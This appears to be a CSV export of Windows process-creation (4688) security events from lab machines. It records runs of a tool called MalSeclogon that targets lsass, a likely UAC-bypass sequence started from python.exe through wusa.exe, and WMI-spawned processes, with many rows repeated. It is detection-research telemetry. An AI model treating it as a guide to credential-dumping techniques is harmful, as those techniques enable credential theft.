+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" +2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" +2019-03-18T15:06:46.345209+04:00,1552907206.345209,4688,C:\Windows\System32\dllhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433078 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xf6c + C:\Windows\System32\dllhost.exe + %%1936 + 0x278 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\conhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432906 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x370 + C:\Windows\System32\conhost.exe + %%1936 + 0x764 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\cmd.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432905 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x440 + C:\Windows\System32\cmd.exe + %%1936 + 0x448 + + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4688,C:\Windows\System32\calc.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563299 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-20 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e4 + 0x424 + C:\Windows\System32\calc.exe + %%1936 + 0xae8 + + +" +2019-03-19T02:15:49.692401+04:00,1552947349.692401,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563298 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xae8 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" +2019-03-19T04:02:07.445773+04:00,1552953727.445773,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566844 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x3b4 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" +2019-03-19T04:02:04.367441+04:00,1552953724.367441,4688,C:\Windows\System32\tasklist.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566839 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x970 + C:\Windows\System32\tasklist.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.351252+04:00,1552953724.351252,4688,C:\Windows\System32\conhost.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566838 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xebc + C:\Windows\System32\conhost.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.335561+04:00,1552953724.335561,4688,C:\Windows\System32\cmd.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566837 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xbcc + C:\Windows\System32\cmd.exe + %%1936 + 0x33c + + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" +2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" +2019-03-18T15:27:05.455663+04:00,1552908425.455663,4688,C:\Windows\System32\wbem\WMIC.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433308 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + 0x44c + C:\Windows\System32\wbem\WMIC.exe + %%1936 + 0x86c + + +" +2019-02-13T22:05:06.665634+04:00,1550081106.665634,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227784 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x7f0 + C:\Windows\System32\AtBroker.exe + %%1936 + 0xdec + + +" +2019-02-13T22:05:06.585519+04:00,1550081106.585519,4688,C:\Windows\System32\rdpclip.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227783 + + + + + Security + PC01.example.corp + + + + + S-1-5-20 + PC01$ + EXAMPLE + 0x3e4 + 0xa1c + C:\Windows\System32\rdpclip.exe + %%1936 + 0x500 + + +" +2019-02-13T22:05:05.453892+04:00,1550081105.453892,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227776 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" +2019-02-13T22:05:05.253604+04:00,1550081105.253604,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227775 + + + + + Security + PC01.example.corp + 